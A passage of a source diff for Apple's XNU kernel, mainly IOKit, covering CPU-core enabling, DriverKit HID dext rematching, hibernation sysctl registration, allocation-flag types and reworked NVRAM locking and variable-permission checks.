+ * @abstract Enable a single CPU core. + * @discussion Release a secondary CPU core from reset, and enable + * external IRQ delivery to the core. XNU will not + * invoke this method on the boot CPU's cpu_id. + * @param cpu_id Logical CPU ID of the core. + * @param entry_pa Physical address to use as the reset vector on the + * secondary CPU. Not all platforms will honor this + * parameter; on Apple Silicon RVBAR_EL1 is programmed + * by iBoot. + */ + virtual void enableCPUCore(unsigned int cpu_id, uint64_t entry_pa); + /*! * @function enableCPUCore - * @abstract Enable a single CPU core. - * @discussion Release a secondary CPU core from reset, and enable - * external IRQ delivery to the core. XNU will not - * invoke this method on the boot CPU's cpu_id. - * @param cpu_id Logical CPU ID of the core. + * @abstract Deprecated - Enable a single CPU core. */ - virtual void enableCPUCore(unsigned int cpu_id) = 0; + virtual void enableCPUCore(unsigned int cpu_id); /*! * @function disableCPUCore diff --git a/iokit/IOKit/IOPlatformExpert.h b/iokit/IOKit/IOPlatformExpert.h index 6e3e852a3..8954d781c 100644 --- a/iokit/IOKit/IOPlatformExpert.h +++ b/iokit/IOKit/IOPlatformExpert.h @@ -79,7 +79,8 @@ enum { kPEPagingOff, kPEPanicBegin, kPEPanicEnd, - kPEPanicRestartCPUNoCallouts + kPEPanicRestartCPUNoCallouts, + kPEPanicDiagnosticsDone, }; /* Bitmask of details related to panic callouts */ @@ -95,6 +96,7 @@ extern int PEHaltRestartInternal(unsigned int type, uint32_t details); enum { kIOSystemShutdownNotificationStageProcessExit = 0, kIOSystemShutdownNotificationStageRootUnmount = 1, + kIOSystemShutdownNotificationTerminateDEXTs = 2, }; extern void IOSystemShutdownNotification(int stage); diff --git a/iokit/IOKit/IOStatisticsPrivate.h b/iokit/IOKit/IOStatisticsPrivate.h index ba3c5063f..47756e784 100644 --- a/iokit/IOKit/IOStatisticsPrivate.h +++ b/iokit/IOKit/IOStatisticsPrivate.h @@ -239,6 +239,12 @@ public: static void initialize(); + inline static bool + isEnabled() + { + return enabled; + } + static void onKextLoad(OSKext *kext, kmod_info_t *kmod_info); static void onKextUnload(OSKext *kext); static void onClassAdded(OSKext *parentKext, OSMetaClass *metaClass); diff --git a/iokit/IOKit/IOUserServer.h b/iokit/IOKit/IOUserServer.h index a750d3fec..a9c8d122f 100644 --- a/iokit/IOKit/IOUserServer.h +++ b/iokit/IOKit/IOUserServer.h @@ -142,6 +142,7 @@ void serverAdd(IOUserServer * server); void serverRemove(IOUserServer * server); void serverAck(IOUserServer * server); bool serverSlept(void); +void systemHalt(void); }; /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ @@ -204,6 +205,7 @@ public: void setDriverKitUUID(OSKext *kext); void setCheckInToken(IOUserServerCheckInToken *token); void systemPower(bool powerOff); + void systemHalt(void); IOReturn setPowerState(unsigned long state, IOService * service) APPLE_KEXT_OVERRIDE; IOReturn powerStateWillChangeTo(IOPMPowerFlags flags, unsigned long state, IOService * service) APPLE_KEXT_OVERRIDE; IOReturn powerStateDidChangeTo(IOPMPowerFlags flags, unsigned long state, IOService * service) APPLE_KEXT_OVERRIDE; diff --git a/iokit/IOKit/pwr_mgt/IOPM.h b/iokit/IOKit/pwr_mgt/IOPM.h index 1f2b651ad..bbcbe802f 100644 --- a/iokit/IOKit/pwr_mgt/IOPM.h +++ b/iokit/IOKit/pwr_mgt/IOPM.h @@ -672,6 +672,7 @@ enum { kIOPSFamilyCodeExternal4 = iokit_family_err(sub_iokit_pmu, 4), kIOPSFamilyCodeExternal5 = iokit_family_err(sub_iokit_pmu, 5), kIOPSFamilyCodeExternal6 = iokit_family_err(sub_iokit_pmu, 6), + kIOPSFamilyCodeExternal7 = iokit_family_err(sub_iokit_pmu, 7), }; // values for kIOPMPSAdapterDetailsErrorFlagsKey diff --git a/iokit/IOKit/pwr_mgt/IOPMPrivate.h b/iokit/IOKit/pwr_mgt/IOPMPrivate.h index 4c1eb9eec..690bb8041 100644 --- a/iokit/IOKit/pwr_mgt/IOPMPrivate.h +++ b/iokit/IOKit/pwr_mgt/IOPMPrivate.h @@ -112,9 +112,6 @@ enum { #define kIOPMMessageRequestUserActive \ iokit_family_msg(sub_iokit_powermanagement, 0x460) -#define kIOPMMessageRequestSystemShutdown \ - iokit_family_msg(sub_iokit_powermanagement, 0x470) - /* @enum SystemSleepReasons * @abstract The potential causes for system sleep as logged in the system event record. */ diff --git a/iokit/Kernel/IOBufferMemoryDescriptor.cpp b/iokit/Kernel/IOBufferMemoryDescriptor.cpp index 7b670bf53..de3e2cdd4 100644 --- a/iokit/Kernel/IOBufferMemoryDescriptor.cpp +++ b/iokit/Kernel/IOBufferMemoryDescriptor.cpp @@ -83,10 +83,9 @@ IOBMDPageProc(iopa_t * a) { kern_return_t kr; vm_address_t vmaddr = 0; - int options = 0;// KMA_LOMEM; kr = kernel_memory_allocate(kernel_map, &vmaddr, - page_size, 0, options, VM_KERN_MEMORY_IOKIT); + page_size, 0, KMA_NONE, VM_KERN_MEMORY_IOKIT); if (KERN_SUCCESS != kr) { vmaddr = 0; diff --git a/iokit/Kernel/IOCatalogue.cpp b/iokit/Kernel/IOCatalogue.cpp index 958022743..a57b083a7 100644 --- a/iokit/Kernel/IOCatalogue.cpp +++ b/iokit/Kernel/IOCatalogue.cpp @@ -73,6 +73,7 @@ OSSharedPtr gIOClassKey; OSSharedPtr gIOProbeScoreKey; OSSharedPtr gIOModuleIdentifierKey; OSSharedPtr gIOModuleIdentifierKernelKey; +OSSharedPtr gIOHIDInterfaceClassName; IORWLock * gIOCatalogLock; #if PRAGMA_MARK @@ -113,6 +114,7 @@ IOCatalogue::initialize(void) gIOProbeScoreKey = OSSymbol::withCStringNoCopy( kIOProbeScoreKey ); gIOModuleIdentifierKey = OSSymbol::withCStringNoCopy( kCFBundleIdentifierKey ); gIOModuleIdentifierKernelKey = OSSymbol::withCStringNoCopy( kCFBundleIdentifierKernelKey ); + gIOHIDInterfaceClassName = OSSymbol::withCStringNoCopy( "IOHIDInterface" ); assert( array && gIOClassKey && gIOProbeScoreKey @@ -808,7 +810,9 @@ IOCatalogue::terminateDriversForModule( { IOReturn ret; OSSharedPtr dict; + OSSharedPtr kext; bool isLoaded = false; + bool isDext = false; /* Check first if the kext currently has any linkage dependents; * in such a case the unload would fail so let's not terminate any @@ -829,6 +833,11 @@ IOCatalogue::terminateDriversForModule( goto finish; } } + kext = OSKext::lookupKextWithIdentifier(moduleName->getCStringNoCopy()); + if (kext) { + isDext = kext->isDriverKit(); + } + dict = OSDictionary::withCapacity(1); if (!dict) { ret = kIOReturnNoMemory; @@ -839,20 +848,25 @@ IOCatalogue::terminateDriversForModule( ret = terminateDrivers(dict.get(), NULL); - /* No goto between IOLock calls! - */ - IORWLockWrite(lock); - if (kIOReturnSuccess == ret) { - ret = _removeDrivers(dict.get()); - } + if (isDext) { + /* Force rematching after removing personalities. Dexts are never considered to be "loaded" (from OSKext), + * so we can't call unloadModule() to remove personalities and start rematching. */ + removeDrivers(dict.get(), true); + } else { + /* No goto between IOLock calls! + */ + IORWLockWrite(lock); + if (kIOReturnSuccess == ret) { + ret = _removeDrivers(dict.get()); + } - // Unload the module itself. - if (unload && isLoaded && ret == kIOReturnSuccess) { - ret = unloadModule(moduleName); + // Unload the module itself. + if (unload && isLoaded && ret == kIOReturnSuccess) { + ret = unloadModule(moduleName); + } + IORWLockUnlock(lock); } - IORWLockUnlock(lock); - finish: return ret; } @@ -926,6 +940,8 @@ bool IOCatalogue::startMatching( const OSSymbol * moduleName ) { OSSharedPtr set; + OSSharedPtr kext; + OSSharedPtr servicesToTerminate; if (!moduleName) { return false; @@ -939,6 +955,53 @@ IOCatalogue::startMatching( const OSSymbol * moduleName ) IORWLockRead(lock); + kext = OSKext::lookupKextWithIdentifier(moduleName->getCStringNoCopy()); + if (kext && kext->isDriverKit()) { + /* We're here because kernelmanagerd called IOCatalogueModuleLoaded after launching a dext. + * Determine what providers the dext would match against. If there's something already attached + * to the provider, terminate it. + * + * This is only safe to do for HID dexts. + */ + OSSharedPtr dextPersonalities = kext->copyPersonalitiesArray(); + + if (!dextPersonalities) { + return false; + } + + servicesToTerminate = OSArray::withCapacity(1); + if (!servicesToTerminate) { + return false; + } + + dextPersonalities->iterateObjects(^bool (OSObject * obj) { + OSDictionary * personality = OSDynamicCast(OSDictionary, obj); + OSSharedPtr iter; + IOService * provider; + OSSharedPtr service; + const OSSymbol * category; + + if (personality) { + category = OSDynamicCast(OSSymbol, personality->getObject(gIOMatchCategoryKey)); + if (!category) { + category = gIODefaultMatchCategoryKey; + } + iter = IOService::getMatchingServices(personality); + + while (iter && (provider = OSDynamicCast(IOService, iter->getNextObject()))) { + if (provider->metaCast(gIOHIDInterfaceClassName.get()) != NULL) { + service.reset(provider->copyClientWithCategory(category), OSNoRetain); + if (service) { + servicesToTerminate->setObject(service); + } + } + } + } + + return false; + }); + } + personalities->iterateObjects(^bool (const OSSymbol * key, OSObject * value) { OSArray * array; OSDictionary * dict; @@ -958,6 +1021,22 @@ IOCatalogue::startMatching( const OSSymbol * moduleName ) return false; }); + if (servicesToTerminate) { + servicesToTerminate->iterateObjects(^bool (OSObject * obj) { + IOService * service = OSDynamicCast(IOService, obj); + if (service) { + IOOptionBits terminateOptions = kIOServiceRequired; + if (service->hasUserServer()) { + terminateOptions |= kIOServiceTerminateNeedWillTerminate; + } + if (!service->terminate(terminateOptions)) { + IOLog("%s: failed to terminate service %s-0x%qx with options %08llx for new dext %s\n", __FUNCTION__, service->getName(), service->getRegistryEntryID(), (long long)terminateOptions, moduleName->getCStringNoCopy()); + } + } + return false; + }); + } + // Start device matching. if (set->getCount() > 0) { IOService::catalogNewDrivers(set.get()); diff --git a/iokit/Kernel/IODMACommand.cpp b/iokit/Kernel/IODMACommand.cpp index 484656a0d..5da53410f 100644 --- a/iokit/Kernel/IODMACommand.cpp +++ b/iokit/Kernel/IODMACommand.cpp @@ -664,7 +664,7 @@ IODMACommand::walkAll(uint32_t op) } kr = vm_page_alloc_list(state->fCopyPageCount, - KMA_LOMEM | KMA_NOPAGEWAIT, &mapBase); + (kma_flags_t)(KMA_LOMEM | KMA_NOPAGEWAIT), &mapBase); if (KERN_SUCCESS != kr) { DEBG("vm_page_alloc_list(%d) failed (%d)\n", state->fCopyPageCount, kr); mapBase = NULL; diff --git a/iokit/Kernel/IOHibernateIO.cpp b/iokit/Kernel/IOHibernateIO.cpp index 2fc024f6e..3303016d0 100644 --- a/iokit/Kernel/IOHibernateIO.cpp +++ b/iokit/Kernel/IOHibernateIO.cpp @@ -1462,36 +1462,37 @@ IOHibernateWasScreenLocked(void) /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ SYSCTL_STRING(_kern, OID_AUTO, hibernatefile, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, gIOHibernateFilename, sizeof(gIOHibernateFilename), ""); SYSCTL_STRING(_kern, OID_AUTO, bootsignature, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, gIOHibernateBootSignature, sizeof(gIOHibernateBootSignature), ""); SYSCTL_UINT(_kern, OID_AUTO, hibernatemode, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, &gIOHibernateMode, 0, ""); SYSCTL_STRUCT(_kern, OID_AUTO, hibernatestatistics, - CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, &_hibernateStats, hibernate_statistics_t, ""); -SYSCTL_STRING(_kern_bridge, OID_AUTO, bootsessionuuid, - CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, - gIOHibernateBridgeBootSessionUUIDString, sizeof(gIOHibernateBridgeBootSessionUUIDString), ""); +SYSCTL_OID_MANUAL(_kern_bridge, OID_AUTO, bootsessionuuid, + CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + gIOHibernateBridgeBootSessionUUIDString, sizeof(gIOHibernateBridgeBootSessionUUIDString), + sysctl_handle_string, "A", ""); SYSCTL_UINT(_kern, OID_AUTO, hibernategraphicsready, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY, &_hibernateStats.graphicsReadyTime, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, hibernatewakenotification, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY, &_hibernateStats.wakeNotificationTime, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, hibernatelockscreenready, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY, &_hibernateStats.lockScreenReadyTime, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, hibernatehidready, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY, &_hibernateStats.hidReadyTime, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, hibernatecount, - CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY, + CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_ANYBODY, &gIOHibernateCount, 0, ""); /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ @@ -1561,16 +1562,6 @@ IOHibernateSystemInit(IOPMrootDomain * rootDomain) gIOHibernateFilename[0] = 0; } - sysctl_register_oid(&sysctl__kern_hibernatefile); - sysctl_register_oid(&sysctl__kern_bootsignature); - sysctl_register_oid(&sysctl__kern_hibernatemode); - sysctl_register_oid(&sysctl__kern_hibernatestatistics); - sysctl_register_oid(&sysctl__kern_hibernategraphicsready); - sysctl_register_oid(&sysctl__kern_hibernatewakenotification); - sysctl_register_oid(&sysctl__kern_hibernatelockscreenready); - sysctl_register_oid(&sysctl__kern_hibernatehidready); - sysctl_register_oid(&sysctl__kern_hibernatecount); - gIOChosenEntry = IORegistryEntry::fromPath("/chosen", gIODTPlane); if (gIOChosenEntry diff --git a/iokit/Kernel/IOKitDebug.cpp b/iokit/Kernel/IOKitDebug.cpp index 0a4213b38..b61d58a14 100644 --- a/iokit/Kernel/IOKitDebug.cpp +++ b/iokit/Kernel/IOKitDebug.cpp @@ -77,7 +77,7 @@ sysctl_debug_iokit } SYSCTL_PROC(_debug, OID_AUTO, iokit, - CTLTYPE_QUAD | IODEBUG_CTLFLAGS | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_QUAD | IODEBUG_CTLFLAGS | CTLFLAG_KERN | CTLFLAG_LOCKED, &gIOKitDebug, 0, sysctl_debug_iokit, "Q", "boot_arg io"); size_t debug_malloc_size; diff --git a/iokit/Kernel/IOKitKernelInternal.h b/iokit/Kernel/IOKitKernelInternal.h index 1cbb0485d..a829c88d4 100644 --- a/iokit/Kernel/IOKitKernelInternal.h +++ b/iokit/Kernel/IOKitKernelInternal.h @@ -198,6 +198,9 @@ extern bool gCPUsRunning; extern OSSet * gIORemoveOnReadProperties; +extern uint32_t gHaltTimeMaxLog; +extern uint32_t gHaltTimeMaxPanic; + extern "C" void IOKitInitializeTime( void ); extern void IOMachPortInitialize(void); @@ -214,8 +217,6 @@ extern "C" void IOKitKernelLogBuffer(const char * title, const void * buffer, si extern const OSSymbol * gIOCreateEFIDevicePathSymbol; extern "C" void IOSetKeyStoreData(LIBKERN_CONSUMED IOMemoryDescriptor * data); extern "C" void IOSetAPFSKeyStoreData(LIBKERN_CONSUMED IOMemoryDescriptor* data); -extern "C" void IOSetARVRootHashData(LIBKERN_CONSUMED IOMemoryDescriptor* arvData); -extern "C" void IOSetARVManifestData(LIBKERN_CONSUMED IOMemoryDescriptor* arvData); #endif extern const OSSymbol * gAKSGetKey; diff --git a/iokit/Kernel/IOLib.cpp b/iokit/Kernel/IOLib.cpp index 6d3312369..8246f6261 100644 --- a/iokit/Kernel/IOLib.cpp +++ b/iokit/Kernel/IOLib.cpp @@ -451,7 +451,7 @@ IOMallocAligned_internal(struct kalloc_heap *kheap, vm_size_t size, address = 0; /* overflow detected */ } else if (adjustedSize >= page_size) { kr = kernel_memory_allocate(kernel_map, &address, - size, alignMask, 0, IOMemoryTag(kernel_map)); + size, alignMask, KMA_NONE, IOMemoryTag(kernel_map)); if (KERN_SUCCESS != kr) { address = 0; } @@ -465,7 +465,7 @@ IOMallocAligned_internal(struct kalloc_heap *kheap, vm_size_t size, if (adjustedSize >= page_size) { kr = kernel_memory_allocate(kernel_map, &allocationAddress, - adjustedSize, 0, 0, IOMemoryTag(kernel_map)); + adjustedSize, 0, KMA_NONE, IOMemoryTag(kernel_map)); if (KERN_SUCCESS != kr) { allocationAddress = 0; } @@ -628,7 +628,7 @@ IOKernelAllocateWithPhysicalRestrict(mach_vm_size_t size, mach_vm_address_t maxP || (alignment > page_size); if (contiguous || maxPhys) { - int options = 0; + kma_flags_t options = KMA_NONE; vm_offset_t virt; adjustedSize = size; @@ -643,14 +643,15 @@ IOKernelAllocateWithPhysicalRestrict(mach_vm_size_t size, mach_vm_address_t maxP #endif if (maxPhys <= 0xFFFFFFFF) { maxPhys = 0; - options |= KMA_LOMEM; + options = (kma_flags_t)(options | KMA_LOMEM); } else if (gIOLastPage && (atop_64(maxPhys) > gIOLastPage)) { maxPhys = 0; } } if (contiguous || maxPhys) { kr = kmem_alloc_contig(kernel_map, &virt, size, - alignMask, (ppnum_t) atop(maxPhys), (ppnum_t) atop(alignMask), 0, IOMemoryTag(kernel_map)); + alignMask, (ppnum_t) atop(maxPhys), (ppnum_t) atop(alignMask), + KMA_NONE, IOMemoryTag(kernel_map)); } else { kr = kernel_memory_allocate(kernel_map, &virt, size, alignMask, options, IOMemoryTag(kernel_map)); diff --git a/iokit/Kernel/IOMemoryDescriptor.cpp b/iokit/Kernel/IOMemoryDescriptor.cpp index e4accd208..348cc8975 100644 --- a/iokit/Kernel/IOMemoryDescriptor.cpp +++ b/iokit/Kernel/IOMemoryDescriptor.cpp @@ -5307,12 +5307,6 @@ IOMemoryMap::free() fMemory.reset(); } - if (fOwner && (fOwner != fMemory)) { - LOCK; - fOwner->removeMapping(this); - UNLOCK; - } - if (fSuperMap) { fSuperMap.reset(); } diff --git a/iokit/Kernel/IONVRAM.cpp b/iokit/Kernel/IONVRAM.cpp index 69725d403..06d2efcdb 100644 --- a/iokit/Kernel/IONVRAM.cpp +++ b/iokit/Kernel/IONVRAM.cpp @@ -40,6 +40,7 @@ #include #include #include +#include #define super IOService @@ -52,12 +53,11 @@ // From Apple CHRP Spec #define NVRAM_CHRP_SIG_SYSTEM 0x70 #define NVRAM_CHRP_SIG_CONFIG 0x71 -#define NVRAM_CHRP_SIG_FREESPACE 0x7F -#define NVRAM_CHRP_PARTITION_NAME_COMMON "common" -#define NVRAM_CHRP_PARTITION_NAME_SYSTEM "system" -#define NVRAM_CHRP_PARTITION_NAME_SYSTEM_LEGACY "secure" -#define NVRAM_CHRP_PARTITION_NAME_FREESPACE "\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77" +#define NVRAM_CHRP_PARTITION_NAME_COMMON_V1 "common" +#define NVRAM_CHRP_PARTITION_NAME_SYSTEM_V1 "system" +#define NVRAM_CHRP_PARTITION_NAME_COMMON_V2 "2common" +#define NVRAM_CHRP_PARTITION_NAME_SYSTEM_V2 "2system" #define NVRAM_CHRP_LENGTH_BLOCK_SIZE 0x10 // CHRP length field is in 16 byte blocks @@ -112,26 +112,43 @@ OSDefineMetaClassAndStructors(IODTNVRAM, IOService); IOLockUnlock(_controllerLock); \ }) -#define NVRAMLOCK() \ -({ \ +#define NVRAMREADLOCK() \ +({ \ if (preemption_enabled() && !panic_active()) \ - IOLockLock(_variableLock); \ + IORWLockRead(_variableLock); \ }) -#define NVRAMUNLOCK() \ -({ \ +#define NVRAMWRITELOCK() \ +({ \ if (preemption_enabled() && !panic_active()) \ - IOLockUnlock(_variableLock); \ + IORWLockWrite(_variableLock); \ }) -#define NVRAMLOCKASSERT() \ -({ \ - if (preemption_enabled() && !panic_active()) \ - IOLockAssert(_variableLock, kIOLockAssertOwned); \ +#define NVRAMUNLOCK() \ +({ \ + if (preemption_enabled() && !panic_active()) \ + IORWLockUnlock(_variableLock); \ +}) + +#define NVRAMLOCKASSERTHELD() \ +({ \ + if (preemption_enabled() && !panic_active()) \ + IORWLockAssert(_variableLock, kIORWLockAssertHeld); \ }) +#define NVRAMLOCKASSERTEXCLUSIVE() \ +({ \ + if (preemption_enabled() && !panic_active()) \ + IORWLockAssert(_variableLock, kIORWLockAssertWrite); \ +}) + +enum NVRAMPartitionType { + kIONVRAMPartitionSystem, + kIONVRAMPartitionCommon +}; + typedef struct { - const char *name; + NVRAMPartitionType type; UInt32 offset; UInt32 size; OSSharedPtr &dict; @@ -147,130 +164,29 @@ UUID_DEFINE(gAppleSystemVariableGuid, 0x40, 0xA0, 0xDD, 0xD2, 0x77, 0xF8, 0x43, UUID_DEFINE(gAppleNVRAMGuid, 0x7C, 0x43, 0x61, 0x10, 0xAB, 0x2A, 0x4B, 0xBB, 0xA8, 0x80, 0xFE, 0x41, 0x99, 0x5C, 0x9F, 0x82); static bool gNVRAMLogging = false; +static bool gInternalBuild = false; // allowlist variables from macboot that need to be set/get from system region if present static const char * const gNVRAMSystemList[] = { - "adbe-tunable", - "adbe-tunables", - "adfe-tunables", - "alamo-path", - "alt-boot-volume", - "ASMB", - "atc0", - "atc1", + "allow-root-hash-mismatch", "auto-boot", "auto-boot-halt-stage", - "auto-boot-once", - "auto-boot-usb", - "auxkc-path", - "backlight-level", - "backlight-nits", "base-system-path", "boot-args", - "boot-breadcrumbs", "boot-command", - "boot-device", "boot-image", - "boot-partition", - "boot-path", - "boot-ramdisk", - "boot-script", - "boot-volume", "bootdelay", - "bt1addr", - "btaddr", - "cam-use-ext-ldo", - "CLCG_override", "com.apple.System.boot-nonce", - "com.apple.System.rtc-offset", - "com.apple.System.tz0-size", - "core-bin-offset", - "cpu-bin-offset", "darkboot", - "DClr_override", - "dcp-auto-boot", - "debug-gg", - "debug-soc", - "debug-uarts", - "diags-path", - "disable-boot-wdt", - "display-color-space", - "display-timing", - "display-vsh-comp", - "dpcd-max-brightness", - "dtdump", - "dtdump-path", - "e75", "emu", - "enable-auth-debug", - "enable-jop", - "enable-marconi", - "enable-upgrade-fallback", - "enforce-iuob", - "eth1addr", - "ethaddr", - "failboot-breadcrumbs", - "fixed-lcm-boost", - "force-ctrr-lock", - "force-upgrade-fail", - "fuos-path", - "hib-ui-force", - "hibhack-test-hmac", - "iboot-data", - "iboot-failure-reason", - "iboot-failure-reason-str", - "iboot-failure-volume", - "iboot1-precommitted", - "idle-off", - "is-tethered", - "kaslr-off", - "kaslr-slide", - "kis-rsm", - "knobs", - "loadaddr", - "memmapdump", - "mipi-bridge-cmd-verify", - "mipi-bridge-poll-cmd-fifo", - "no-ctrr", - "one-time-boot-command", - "osenvironment", - "ota-breadcrumbs", - "ota-outcome", - "panicmedic", - "panicmedic-threshold", - "panicmedic-timestamps", - "phleet-path", - "pinot-panel-id", - "pintoaddr", + "one-time-boot-command", // Needed for diags customer install flows "policy-nonce-digests", - "preserve-debuggability", "prevent-restores", // Keep for factory "prev-lang:kbd", - "ramrod-kickstart-aces", - "rbdaddr0", - "rbm-path", - "reconfig-behavior", - "reconfig-breakpoints", - "recovery-boot-mode", - "recovery-breadcrumbs", - "restored-host-timeout", "root-live-fs", - "rtos-path", - "soc-bin-offset", - "StartupMute", - "StartupMuteAccessibility", - "storage-prev-assert", - "storage-prev-assert-stored", - "summit-panel-id", "SystemAudioVolume", "SystemAudioVolumeExtension", "SystemAudioVolumeSaved", - "tz0-size-override", - "upgrade-fallback-boot-command", - "upgrade-retry", - "usb-enabled", - "wifi1addr", - "wifiaddr", nullptr }; @@ -361,7 +277,7 @@ VariablePermissionEntry gVariablePermissions[] = { .p.Bits.NeverAllowedToDelete = 1}, {"boot-image", .p.Bits.UserWrite = 1}, {"com.apple.System.fp-state", .p.Bits.KernelOnly = 1}, - {"policy-nonce-digests", .p.Bits.ResetNVRAMOnlyDelete = 1}, + {"policy-nonce-digests", .p.Bits.ResetNVRAMOnlyDelete = 1}, // Deleting this via user triggered obliterate leave J273a unable to boot {"security-password", .p.Bits.RootRequired = 1}, #if !defined(__x86_64__) @@ -369,6 +285,7 @@ VariablePermissionEntry gVariablePermissions[] = { {"acc-cm-override-count", .p.Bits.KernelOnly = 1}, {"acc-mb-ld-lifetime", .p.Bits.KernelOnly = 1}, {"backlight-level", .p.Bits.UserWrite = 1}, + {"backlight-nits", .p.Bits.UserWrite = 1}, {"com.apple.System.boot-nonce", .p.Bits.KernelOnly = 1}, {"com.apple.System.sep.art", .p.Bits.KernelOnly = 1}, {"darkboot", .p.Bits.UserWrite = 1}, @@ -445,11 +362,33 @@ verifyWriteSizeLimit(const uuid_t *varGuid, const char *variableName, size_t pro return true; } +#if defined(DEBUG) || defined(DEVELOPMENT) +static const char * +getNVRAMOpString(IONVRAMOperation op) +{ + switch (op) { + case kIONVRAMOperationRead: + return "Read"; + case kIONVRAMOperationWrite: + return "Write"; + case kIONVRAMOperationDelete: + return "Delete"; + case kIONVRAMOperationObliterate: + return "Obliterate"; + case kIONVRAMOperationReset: + return "Reset"; + default: + return "Unknown"; + } +} +#endif + static bool verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName) { VariablePermission perm; - bool kernel, admin, writeEntitled, readEntitled, allowList, systemGuid, systemEntitled; + bool kernel, admin, writeEntitled, readEntitled, allowList, systemGuid, systemEntitled, systemInternalEntitled, systemAllow; + bool ok = false; perm = getVariablePermission(varName); @@ -457,20 +396,24 @@ verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName if (perm.Bits.KernelOnly) { DEBUG_INFO("KernelOnly access for %s, kernel=%d\n", varName, kernel); - return kernel; + ok = kernel; + goto exit; } - allowList = variableInAllowList(varName); - systemGuid = uuid_compare(*varGuid, gAppleSystemVariableGuid) == 0; - admin = IOUserClient::clientHasPrivilege(current_task(), kIONVRAMPrivilege) == kIOReturnSuccess; - writeEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMWriteAccessKey); - readEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMReadAccessKey); - systemEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMSystemAllowKey) || kernel; + allowList = variableInAllowList(varName); + systemGuid = uuid_compare(*varGuid, gAppleSystemVariableGuid) == 0; + admin = IOUserClient::clientHasPrivilege(current_task(), kIONVRAMPrivilege) == kIOReturnSuccess; + writeEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMWriteAccessKey); + readEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMReadAccessKey); + systemEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMSystemAllowKey); + systemInternalEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMSystemInternalAllowKey); + + systemAllow = systemEntitled || (systemInternalEntitled && gInternalBuild) || kernel; switch (op) { case kIONVRAMOperationRead: if (kernel || admin || readEntitled || perm.Bits.FullAccess) { - return true; + ok = true; } break; @@ -478,15 +421,15 @@ verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName if (kernel || perm.Bits.UserWrite || admin || writeEntitled) { if (systemGuid) { if (allowList) { - if (!systemEntitled) { + if (!systemAllow) { DEBUG_ERROR("Allowed write to system region when NOT entitled for %s\n", varName); } - } else if (!systemEntitled) { + } else if (!systemAllow) { DEBUG_ERROR("Not entitled for system region writes for %s\n", varName); break; } } - return true; + ok = true; } break; @@ -499,27 +442,31 @@ verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName } else if ((op == kIONVRAMOperationObliterate) && perm.Bits.ResetNVRAMOnlyDelete) { DEBUG_INFO("Not allowed to obliterate %s\n", varName); break; + } else if ((op == kIONVRAMOperationDelete) && perm.Bits.ResetNVRAMOnlyDelete) { + DEBUG_INFO("Only allowed to delete %s via NVRAM reset\n", varName); + break; } if (kernel || perm.Bits.UserWrite || admin || writeEntitled) { if (systemGuid) { if (allowList) { - if (!systemEntitled) { + if (!systemAllow) { DEBUG_ERROR("Allowed delete to system region when NOT entitled for %s\n", varName); } - } else if (!systemEntitled) { + } else if (!systemAllow) { DEBUG_ERROR("Not entitled for system region deletes for %s\n", varName); break; } } - return true; + ok = true; } break; } - DEBUG_INFO("Permission for %s denied, kernel=%d, admin=%d, writeEntitled=%d, readEntitled=%d, systemGuid=%d, systemEntitled=%d\n", - varName, kernel, admin, writeEntitled, readEntitled, systemGuid, systemEntitled); - return false; +exit: + DEBUG_INFO("Permission for %s of %s %s: kernel=%d, admin=%d, writeEntitled=%d, readEntitled=%d, systemGuid=%d, systemEntitled=%d, systemInternalEntitled=%d, UserWrite=%d\n", + getNVRAMOpString(op), varName, ok ? "granted" : "denied", kernel, admin, writeEntitled, readEntitled, systemGuid, systemEntitled, systemInternalEntitled, perm.Bits.UserWrite); + return ok; 